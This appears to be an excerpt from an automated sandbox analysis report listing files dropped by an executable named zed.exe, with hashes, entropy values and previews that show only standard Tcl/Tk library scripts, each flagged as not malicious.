                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:CsUgabAOgjDnzJNBc6ynID/cL4RpncleXN17MQ9PCSIBIQ08hof7MQ9PCSIBIQei:lGbyntNO6LYZliCNBIUhkCNBIFi
                                                                                                                                                                                                                                            MD5:8A0517A7A4C70111080ED934329E2BC5
                                                                                                                                                                                                                                            SHA1:5B465E0D3500A8F04EE1C705662032F44E2ED0D2
                                                                                                                                                                                                                                            SHA-256:A5D208887A94832328C3A33928A80F3B46AA205C20DB4F050A47D940E94071B4
                                                                                                                                                                                                                                            SHA-512:D9F502A006A5E0514FD61426818AD1F4168E449588F9D383D6B0BF87A18BE82C420863A9A28E1BEB441284A0B1BC2A0B3D3276A0FE3196341AEC15A27920DE5D
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:if {![package vsatisfies [package provide Tcl] 8.6.0]} return..if {($::tcl_platform(platform) eq "unix") && ([info exists ::env(DISPLAY)]...|| ([info exists ::argv] && ("-display" in $::argv)))} {.. package ifneeded Tk 8.6.13 [list load [file join $dir .. .. bin libtk8.6.dll]]..} else {.. package ifneeded Tk 8.6.13 [list load [file join $dir .. .. bin tk86t.dll]]..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:Tcl script, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):7632
                                                                                                                                                                                                                                            Entropy (8bit):4.891666209090638
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:Eet0t8bm9Z+Yjo+j/YKOtOUOtk8XKUal320:EetG8biZZs+bIAUoxX0d
                                                                                                                                                                                                                                            MD5:21A3AC11146EC26784C0E729D8D644D0
                                                                                                                                                                                                                                            SHA1:C7E0918E8692C42C1D1DD1BBCBFFF22A85979B69
                                                                                                                                                                                                                                            SHA-256:579701605669AADFFBCDB7E3545C68442495428EE6E93C2D3A3133583BCD3D33
                                                                                                                                                                                                                                            SHA-512:724ED83B989AD9033BEC4211EE50E4C9E85B51054C518CDF7E02D0ED0416F636B9F38C0B0D29F8F4F7F465B77C7D2E01D0918D2C2C3FEC4C7739EA982302FA2E
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# safetk.tcl --..#..# Support procs to use Tk in safe interpreters...#..# Copyright (c) 1997 Sun Microsystems, Inc...#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES.....# see safetk.n for documentation....#..#..# Note: It is now ok to let untrusted code being executed..# between the creation of the interp and the actual loading..# of Tk in that interp because the C side Tk_Init will..# now look up the parent interp and ask its safe::TkInit..# for the actual parameters to use for it's initialization (if allowed),..# not relying on the child state...#....# We use opt (optional arguments parsing)..package require opt 0.4.1;....namespace eval ::safe {.... # counter for safe toplevels.. variable tkSafeId 0..}....#..# tkInterpInit : prepare the child interpreter for tk loading..# most of the real job is done by loadTk..# returns the child name (tkInterpInit
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):8693
                                                                                                                                                                                                                                            Entropy (8bit):4.968450834020619
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:GSusE8YOdpO4aDtao+QYa6t2jooB6ajpaqa5xQGmLGKOC9dLrVx:KsbYQO48t+QYa+NkFjpagGmKKX9dLrVx
                                                                                                                                                                                                                                            MD5:D45202D3D2D052D4C6BFE8D1322AAB39
                                                                                                                                                                                                                                            SHA1:8CDF184AC2E9299B2B2A107A64E9D1803AA298DE
                                                                                                                                                                                                                                            SHA-256:0747A387FDD1B2C7135ECEAE7B392ED52E1D1EBF3FFA90FEBE886DBC0981EB74
                                                                                                                                                                                                                                            SHA-512:27B005F955BAE00D15C4492E7BD3EBDC5EE3BF9C164C418198B4BD185709C8810AA6CF76CBCC07EEB4C1D20F8C76EF8DF8B219563C18B88C94954C910BFF575D
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# scale.tcl --..#..# This file defines the default bindings for Tk scale widgets and provides..# procedures that help in implementing the bindings...#..# Copyright (c) 1994 The Regents of the University of California...# Copyright (c) 1994-1995 Sun Microsystems, Inc...#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES...#....#-------------------------------------------------------------------------..# The code below creates the default class bindings for entries...#-------------------------------------------------------------------------....# Standard Motif bindings:....bind Scale <Enter> {.. if {$tk_strictMotif} {...set tk::Priv(activeBg) [%W cget -activebackground]...%W configure -activebackground [%W cget -background].. }.. tk::ScaleActivate %W %x %y..}..bind Scale <Motion> {.. tk::ScaleActivate %W %x %y..}..bind Scale <Leave> {.. if {$tk_strictMotif} {...%W configure -activebackground
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):13188
                                                                                                                                                                                                                                            Entropy (8bit):5.063842571848725
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:Gf7RV8ei32PHKT8H2wwucyRlXn+kl1nBKp4nu5FCyK:2mei3qHKT8WPurnXn+I1nBg4nu5MyK
                                                                                                                                                                                                                                            MD5:5249CD1E97E48E3D6DEC15E70B9D7792
                                                                                                                                                                                                                                            SHA1:612E021BA25B5E512A0DFD48B6E77FC72894A6B9
                                                                                                                                                                                                                                            SHA-256:EEC90404F702D3CFBFAEC0F13BF5ED1EBEB736BEE12D7E69770181A25401C61F
                                                                                                                                                                                                                                            SHA-512:E4E0AB15EB9B3118C30CD2FF8E5AF87C549EAA9B640FFD809A928D96B4ADDEFB9D25EFDD1090FBD0019129CDF355BB2F277BC7194001BA1D2ED4A581110CEAFC
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# scrlbar.tcl --..#..# This file defines the default bindings for Tk scrollbar widgets...# It also provides procedures that help in implementing the bindings...#..# Copyright (c) 1994 The Regents of the University of California...# Copyright (c) 1994-1996 Sun Microsystems, Inc...#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES...#....#-------------------------------------------------------------------------..# The code below creates the default class bindings for scrollbars...#-------------------------------------------------------------------------....# Standard Motif bindings:..if {[tk windowingsystem] eq "x11" || [tk windowingsystem] eq "aqua"} {....bind Scrollbar <Enter> {.. if {$tk_strictMotif} {...set tk::Priv(activeBg) [%W cget -activebackground]...%W configure -activebackground [%W cget -background].. }.. %W activate [%W identify %x %y]..}..bind Scrollbar <Motion> {.. %W activate [%
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):16543
                                                                                                                                                                                                                                            Entropy (8bit):5.034958189335699
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:384:IMpfyeKu9TzD0E8+9T1wqBaQKpiqQr7E32fnzXfWJU:IMpfyeKu9Tx8WODTp2zPP
                                                                                                                                                                                                                                            MD5:EAA36F0AA69AE19DDBDD0448FBAD9D4D
                                                                                                                                                                                                                                            SHA1:EB0ADB4F4D937BAC2F17480ADAF6F948262E754D
                                                                                                                                                                                                                                            SHA-256:747889C3086C917A34554A9DC495BC0C08A03FD3A5828353ED2A64B97F376835
                                                                                                                                                                                                                                            SHA-512:C8368F19EC6842ED67073B9FC9C9274107E643324CB23B28C54DF63FB720F63B043281B30DBEA053D08481B0442A87465F715A8AA0711B01CE83FF7B9F8A4F4C
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# spinbox.tcl --..#..# This file defines the default bindings for Tk spinbox widgets and provides..# procedures that help in implementing those bindings. The spinbox builds..# off the entry widget, so it can reuse Entry bindings and procedures...#..# Copyright (c) 1992-1994 The Regents of the University of California...# Copyright (c) 1994-1997 Sun Microsystems, Inc...# Copyright (c) 1999-2000 Jeffrey Hobbs..# Copyright (c) 2000 Ajuba Solutions..#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES...#....#-------------------------------------------------------------------------..# Elements of tk::Priv that are used in this file:..#..# afterId -..If non-null, it means that auto-scanning is underway..#...and it gives the "after" id for the next auto-scan..#...command to be executed...# mouseMoved -..Non-zero means the mouse has moved a significant..#...amount since the button went down (so, for example,..#.
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):20523
                                                                                                                                                                                                                                            Entropy (8bit):4.786929402401609
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:384:eeVL0UI9Ms++J7VT/hc+ISyNsATbOan/uW/UFQ1gs1gxtKZufe2SvdJcmq/YbhEB:eeF0UI9Ms++J7VT/hc+ISyCATbOan2W+
                                                                                                                                                                                                                                            MD5:9378397DD3DCA9DFB181F6F512B15631
                                                                                                                                                                                                                                            SHA1:4F95DD6B658B6A912725DC7D6226F8414020D6C7
                                                                                                                                                                                                                                            SHA-256:B04B1A675572E6FCD12C5FE82C4FD0930395548436FF93D848BF340AE202E7E3
                                                                                                                                                                                                                                            SHA-512:D28CC3C8F3D0B1B2371CBD9EE29AC6881BABD8A07C762FF8F3284449998EE44FA44752CC8AB0DE47A3492776CE1D13BC8EA18CFDBDF710639D2D62D02CB917A9
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# Tcl autoload index file, version 2.0..# This file is generated by the "auto_mkindex" command..# and sourced to set up indexing information for one or..# more commands. Typically each line is a command that..# sets an element in the auto_index array, where the..# element name is the name of a command and the value is..# a script that loads the command.....set auto_index(::tk::dialog::error::Return) [list source [file join $dir bgerror.tcl]]..set auto_index(::tk::dialog::error::Details) [list source [file join $dir bgerror.tcl]]..set auto_index(::tk::dialog::error::SaveToLog) [list source [file join $dir bgerror.tcl]]..set auto_index(::tk::dialog::error::Destroy) [list source [file join $dir bgerror.tcl]]..set auto_index(::tk::dialog::error::bgerror) [list source [file join $dir bgerror.tcl]]..set auto_index(bgerror) [list source [file join $dir bgerror.tcl]]..set auto_index(::tk::ButtonInvoke) [list source [file join $dir button.tcl]]..set auto_index(::tk::ButtonAutoInvoke) [list sou
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):5309
                                                                                                                                                                                                                                            Entropy (8bit):4.74935501162253
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:wfQXIqAv6iEwYtKVlPBnXWASbvMsDjXKpQQkK2tTsSZQ7Fowqm2K5r:wf+IqI6iU43PJYbvMsDjXKpsK2tISyZV
                                                                                                                                                                                                                                            MD5:5F042DE8AD8941C7B9EF6D7BE06C86E4
                                                                                                                                                                                                                                            SHA1:A4DFCEA2ACCAC2E85EAAA186DC765086D1E3AA3C
                                                                                                                                                                                                                                            SHA-256:A4A8568633F827B54326640E6D1C3FDE4978EDC9E9FA1FB1D7B58F189DF1B1DC
                                                                                                                                                                                                                                            SHA-512:E92A00028696A1557666CAB1C25AE6B63F25D75A9811BFAC56DFC069ECC769CC751B71CC81FA85C9CDE8F7FB6D7121EB64B58548CEE8AFE3F6C4A5C243507216
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# tearoff.tcl --..#..# This file contains procedures that implement tear-off menus...#..# Copyright (c) 1994 The Regents of the University of California...# Copyright (c) 1994-1997 Sun Microsystems, Inc...#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES...#....# ::tk::TearoffMenu --..# Given the name of a menu, this procedure creates a torn-off menu..# that is identical to the given menu (including nested submenus)...# The new torn-off menu exists as a toplevel window managed by the..# window manager. The return value is the name of the new menu...# The window is created at the point specified by x and y..#..# Arguments:..# w -...The menu to be torn-off (duplicated)...# x -...x coordinate where window is created..# y -...y coordinate where window is created....proc ::tk::TearOffMenu {w {x 0} {y 0}} {.. # Find a unique name to use for the torn-off menu. Find the first.. # ancestor of w that is a
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):34969
                                                                                                                                                                                                                                            Entropy (8bit):4.95825801435303
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:768:Rp4LaQDlOrqquMwIMyv4Et8avJLgmTGXs1bYMeNnnZl8n6KRD:RYK8aymTGs1b0xncn6KR
                                                                                                                                                                                                                                            MD5:9CA5094ED6FE46620ABF090BF8E2AE63
                                                                                                                                                                                                                                            SHA1:60DC3C2E3F69CE5B6DB4F2B3A1F3C109D766BC63
                                                                                                                                                                                                                                            SHA-256:AB88556E349F03BACA2D8DC2121071A4F299DB86F484CAB2D9249FF4C7007564
                                                                                                                                                                                                                                            SHA-512:0B0C20A754BE744A7FA214BA06AB0744A9BC466D51F96310D97EA1E61119A8ACFEF24E6DC5C4EBDD2C126BF84ACE74FFE622E9641C87E5A240DD13D1F7B5E6AF
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# text.tcl --..#..# This file defines the default bindings for Tk text widgets and provides..# procedures that help in implementing the bindings...#..# Copyright (c) 1992-1994 The Regents of the University of California...# Copyright (c) 1994-1997 Sun Microsystems, Inc...# Copyright (c) 1998 by Scriptics Corporation...#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES...#....#-------------------------------------------------------------------------..# Elements of ::tk::Priv that are used in this file:..#..# afterId -..If non-null, it means that auto-scanning is underway..#...and it gives the "after" id for the next auto-scan..#...command to be executed...# char -..Character position on the line; kept in order..#...to allow moving up or down past short lines while..#...still remembering the desired position...# mouseMoved -..Non-zero means the mouse has moved a significant..#...amount since the button we
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:Tcl script, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):24102
                                                                                                                                                                                                                                            Entropy (8bit):5.137459715823081
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:384:NJyxt+WaB9USY15gSgC3DbTbXLXKr3cIXyDAbK2LMGgtewT+3oFQRyH5bAy59HmD:NJItNe9USZblXysm7GgteoFQRYMESL
                                                                                                                                                                                                                                            MD5:184D05201893B2042D3FA6140FCF277C
                                                                                                                                                                                                                                            SHA1:AAD67797864456749ADF0C4A1C0BE52F563C8FB8
                                                                                                                                                                                                                                            SHA-256:1D5E7518AFC1382E36BF13FC5196C8A7CD93A4E9D24ACF445522564245A489B0
                                                                                                                                                                                                                                            SHA-512:291BDF793CABC5EC27E8265A8A313FE0F4ACAB4DB6CE507A46488A83EEF72CD43CF5815762B22D1C8D64A9EEDEA927E109F937E6573058E5493B1354DD449CB3
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# tk.tcl --..#..# Initialization script normally executed in the interpreter for each Tk-based..# application. Arranges class bindings for widgets...#..# Copyright (c) 1992-1994 The Regents of the University of California...# Copyright (c) 1994-1996 Sun Microsystems, Inc...# Copyright (c) 1998-2000 Ajuba Solutions...#..# See the file "license.terms" for information on usage and redistribution of..# this file, and for a DISCLAIMER OF ALL WARRANTIES.....# Verify that we have Tk binary and script components from the same release..package require -exact Tk 8.6.13.....# Create a ::tk namespace..namespace eval ::tk {.. # Set up the msgcat commands.. namespace eval msgcat {...namespace export mc mcmax.. if {[interp issafe] || [catch {package require msgcat}]} {.. # The msgcat package is not available. Supply our own.. # minimal replacement... proc mc {src args} {.. return [format $src {*}$args].. }.. proc mc
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):39557
                                                                                                                                                                                                                                            Entropy (8bit):5.186073482848965
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:768:+oj+AqE9cn9tJNgDt0/vsKulXgo65Eh6pQb:+6+Zv/ggEdio65Ehdb
                                                                                                                                                                                                                                            MD5:670837EBC804E7B6E2F65F840BC508D6
                                                                                                                                                                                                                                            SHA1:2DD316487F87DDE5D05F65F564CAE4E1306CE662
                                                                                                                                                                                                                                            SHA-256:3AAA66AE8E74B94481C3F6642634E78BB5D7892771E7C27B54DFA56DED0B2F3C
                                                                                                                                                                                                                                            SHA-512:BB8350ADDF1A25C037DFD60A4AFCBF401CACAD2A370B60BD0BA0981D938C46394BD8D40D1E9A66F4E3C46FCC2A41CF688E78C4F1FE918B45E70D3E92D8B3D116
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# tkfbox.tcl --..#..#.Implements the "TK" standard file selection dialog box. This dialog..#.box is used on the Unix platforms whenever the tk_strictMotif flag is..#.not set...#..#.The "TK" standard file selection dialog box is similar to the file..#.selection dialog box on Win95(TM). The user can navigate the..#.directories by clicking on the folder icons or by selecting the..#."Directory" option menu. The user can select files by clicking on the..#.file icons or by entering a filename in the "Filename:" entry...#..# Copyright (c) 1994-1998 Sun Microsystems, Inc...#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES...#....namespace eval ::tk::dialog {}..namespace eval ::tk::dialog::file {.. namespace import -force ::tk::msgcat::*.. variable showHiddenBtn 0.. variable showHiddenVar 1.... # Create the images if they did not already exist... if {![info exists ::tk::Priv(updirImage)]} {...s
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):3713
                                                                                                                                                                                                                                            Entropy (8bit):4.915055696129498
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:InrWdo3L7Fe5qusQGdrMNnQbfIxEOxE0kFgG0FgGouox9FrGVuwg3kNcT+z5UlEr:UWdsOBn/1i+pqxwNjKs
                                                                                                                                                                                                                                            MD5:01F28512E10ACBDDF93AE2BB29E343BC
                                                                                                                                                                                                                                            SHA1:C9CF23D6315218B464061F011E4A9DC8516C8F1F
                                                                                                                                                                                                                                            SHA-256:AE0437FB4E0EBD31322E4EACA626C12ABDE602DA483BB39D0C5EE1BC00AB0AF4
                                                                                                                                                                                                                                            SHA-512:FE3BAE36DDB67F6D7A90B7A91B6EC1A009CF26C0167C46635E5A9CEAEC9083E59DDF74447BF6F60399657EE9604A2314B170F78A921CF948B2985DDF02A89DA6
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:#..# Ttk widget set: Alternate theme..#....namespace eval ttk::theme::alt {.... variable colors.. array set colors {...-frame .."#d9d9d9"...-window.."#ffffff"...-darker ."#c3c3c3"...-border.."#414141"...-activebg ."#ececec"...-disabledfg."#a3a3a3"...-selectbg."#4a6984"...-selectfg."#ffffff"...-altindicator."#aaaaaa".. }.... ttk::style theme settings alt {.....ttk::style configure "." \... -background .$colors(-frame) \... -foreground .black \... -troughcolor.$colors(-darker) \... -bordercolor.$colors(-border) \... -selectbackground .$colors(-selectbg) \... -selectforeground .$colors(-selectfg) \... -font ..TkDefaultFont \... ;.....ttk::style map "." -background \... [list disabled $colors(-frame) active $colors(-activebg)] ;...ttk::style map "." -foreground [list disabled $colors(-disabledfg)] ;.. ttk::style map "." -embossed [list disabled 1] ;.....ttk::style configure TButton \... -anchor center -width -11 -padding "1 1" \... -reli
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):3838
                                                                                                                                                                                                                                            Entropy (8bit):4.940737732832436
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:WdbclJFvlyLi+8OWXgQahpvAdNutdHrFBlCFBK2tdHkFBlhKgY1geAWUWeFVvtdp:C8EQPNeWgFeqdXj
                                                                                                                                                                                                                                            MD5:F07A3A86362E9E253BE91F59714FE134
                                                                                                                                                                                                                                            SHA1:84DE1AB2EAE62E4B114F0E613BD94955AFA9E6C7
                                                                                                                                                                                                                                            SHA-256:E199CC9C429B35A09721D0A22543C3729E2B8462E68DFA158C0CEC9C70A0D79D
                                                                                                                                                                                                                                            SHA-512:324EAF9F857076CA4FECB26D8DF76F8BB1D3F15EAE55D6B6C9689BF1682B306AC7A3592B6A518D23F9FE4DC21EFB6ACF1ECA948F889FA1ADFFA0E12C0BEAB57F
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:#..# Aqua theme (OSX native look and feel)..#....namespace eval ttk::theme::aqua {.. ttk::style theme settings aqua {.....ttk::style configure . \... -font TkDefaultFont \... -background systemWindowBackgroundColor \... -foreground systemLabelColor \... -selectbackground systemSelectedTextBackgroundColor \... -selectforeground systemSelectedTextColor \... -selectborderwidth 0 \... -insertwidth 1.....ttk::style map . \... -foreground {....disabled systemDisabledControlTextColor....background systemLabelColor} \... -selectbackground {....background systemSelectedTextBackgroundColor....!focus systemSelectedTextBackgroundColor} \... -selectforeground {....background systemSelectedTextColor....!focus systemSelectedTextColor}.....# Button...ttk::style configure TButton -anchor center -width -6 \... -foreground systemControlTextColor...ttk::style map TButton \... -foreground {....pressed white... {alternate !pressed !background} white}...ttk::styl
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):3014
                                                                                                                                                                                                                                            Entropy (8bit):4.917794267131833
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:A5N+EqJWR1eTC01cG61ELLgrDgk1JgQ6TQGvhV5giT6TUP+3JWMHTeJ:kN+RQfccG61ooDgQ6dNT6TUP+PHO
                                                                                                                                                                                                                                            MD5:D4BF1AF5DCDD85E3BD11DBF52EB2C146
                                                                                                                                                                                                                                            SHA1:B1691578041319E671D31473A1DD404855D2038B
                                                                                                                                                                                                                                            SHA-256:E38A9D1F437981AA6BF0BDD074D57B769A4140C0F7D9AFF51743FE4ECC6DFDDF
                                                                                                                                                                                                                                            SHA-512:25834B4B231F4FF1A88EEF67E1A102D1D0546EC3B0D46856258A6BE6BBC4B381389C28E2EB60A01FF895DF24D6450CD16CA449C71F82BA53BA438A4867A47DCD
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:#..# Bindings for Buttons, Checkbuttons, and Radiobuttons...#..# Notes: <Button1-Leave>, <Button1-Enter> only control the "pressed"..# state; widgets remain "active" if the pointer is dragged out...# This doesn't seem to be conventional, but it's a nice way..# to provide extra feedback while the grab is active...# (If the button is released off the widget, the grab deactivates and..# we get a <Leave> event then, which turns off the "active" state)..#..# Normally, <ButtonRelease> and <ButtonN-Enter/Leave> events are..# delivered to the widget which received the initial <Button>..# event. However, Tk [grab]s (#1223103) and menu interactions..# (#1222605) can interfere with this. To guard against spurious..# <Button1-Enter> events, the <Button1-Enter> binding only sets..# the pressed state if the button is currently active...#....namespace eval ttk::button {}....bind TButton <Enter> ..{ %W instate !disabled {%W state active} }..bind TButton <Leave>..{ %W state !active }..bind TButton <s
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):4809
                                                                                                                                                                                                                                            Entropy (8bit):4.905115353394083
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:KrS4se/XhW03cC7TxPp/uo1ZUb0WZvSoetCgV+tMWG3xT3xgNB4x76FAuoxVYuIJ:oS4sSjWwFAGkhiP3xT3xL6B2bbe
                                                                                                                                                                                                                                            MD5:2B20E7B2E6BDDBEB14F5F63BF38DBF24
                                                                                                                                                                                                                                            SHA1:43DB48094C4BD7DE3B76AFBC051D887FEFE9887E
                                                                                                                                                                                                                                            SHA-256:CFFC59931FDD1683AD23895E92522CF49B099128753FCDFF34374024E42CF995
                                                                                                                                                                                                                                            SHA-512:1EB5EA78D26D18EAD6563AFBF1798F71723001DCC945E7DB3E4368564D0563029BE3565876AD8CB97331CFE34B2A0A313FA1BF252B87049160FE5DCD65434775
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:#..# "Clam" theme...#..# Inspired by the XFCE family of Gnome themes...#....namespace eval ttk::theme::clam {.. variable colors.. array set colors {...-disabledfg.."#999999"...-frame .."#dcdad5"...-window .."#ffffff"...-dark..."#cfcdc8"...-darker .."#bab5ab"...-darkest.."#9e9a91"...-lighter.."#eeebe7"...-lightest .."#ffffff"...-selectbg.."#4a6984"...-selectfg.."#ffffff"...-altindicator.."#5895bc"...-disabledaltindicator."#a0a0a0".. }.... ttk::style theme settings clam {.....ttk::style configure "." \... -background $colors(-frame) \... -foreground black \... -bordercolor $colors(-darkest) \... -darkcolor $colors(-dark) \... -lightcolor $colors(-lighter) \... -troughcolor $colors(-darker) \... -selectbackground $colors(-selectbg) \... -selectforeground $colors(-selectfg) \... -selectborderwidth 0 \... -font TkDefaultFont \... ;.....ttk::style map "." \... -background [list disabled $colors(-frame) \..... active $colors(-lighter)] \..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):3864
                                                                                                                                                                                                                                            Entropy (8bit):4.935603001745302
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:zcJZjdWs+WVB4ULsMF7tnvnuSuqo5DKxiFgG0FgGHx9FrGTtu/3Kt+iW2PbuAk38:zcJZEstB4UoituSm+VtYErY
                                                                                                                                                                                                                                            MD5:0205663142775F4EF2EB104661D30979
                                                                                                                                                                                                                                            SHA1:452A0D613288A1CC8A1181C3CC1167E02AA69A73
                                                                                                                                                                                                                                            SHA-256:424BBA4FB6836FEEBE34F6C176ED666DCE51D2FBA9A8D7AA756ABCBBAD3FC1E3
                                                                                                                                                                                                                                            SHA-512:FB4D212A73A6F5A8D2774F43D310328B029B52B35BEE133584D8326363B385AB7AA4AE25E98126324CC716962888321E0006E5F6EF8563919A1D719019B2D117
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:#..# "classic" Tk theme...#..# Implements Tk's traditional Motif-like look and feel...#....namespace eval ttk::theme::classic {.... variable colors; array set colors {...-frame.."#d9d9d9"...-window.."#ffffff"...-activebg."#ececec"...-troughbg."#c3c3c3"...-selectbg."#c3c3c3"...-selectfg."#000000"...-disabledfg."#a3a3a3"...-indicator."#b03060"...-altindicator."#b05e5e".. }.... ttk::style theme settings classic {...ttk::style configure "." \... -font..TkDefaultFont \... -background..$colors(-frame) \... -foreground..black \... -selectbackground.$colors(-selectbg) \... -selectforeground.$colors(-selectfg) \... -troughcolor.$colors(-troughbg) \... -indicatorcolor.$colors(-frame) \... -highlightcolor.$colors(-frame) \... -highlightthickness.1 \... -selectborderwidth.1 \... -insertwidth.2 \... ;.....# To match pre-Xft X11 appearance, use:...#.ttk::style configure . -font {Helvetica 12 bold}.....ttk::style map "." -background \... [list disabled
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):12718
                                                                                                                                                                                                                                            Entropy (8bit):5.063548300335668
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:otLzBJ9SfinaXUBLPYXlk7fKiLH+AzIoJdJwGknmyLsxoVEQGITse8g5sarkT32e:wB5aXmLPYXmrKxLL7A
                                                                                                                                                                                                                                            MD5:F7065D345A4BFB3127C3689BF1947C30
                                                                                                                                                                                                                                            SHA1:9631C05365B0F5A36E4CA5CBA83628CCD7FCBDE1
                                                                                                                                                                                                                                            SHA-256:68EED4AF6D2EC5B3EA24B1122A704B040366CBE2F458103137479352FFA1475A
                                                                                                                                                                                                                                            SHA-512:74B99B9E326680150DD5EC7263192691BCD8A71B2A4EE7F3177DEDDD43E924A7925085C6D372731A70570F96B3924450255B2F54CA3B9C44D1160CA37E715B00
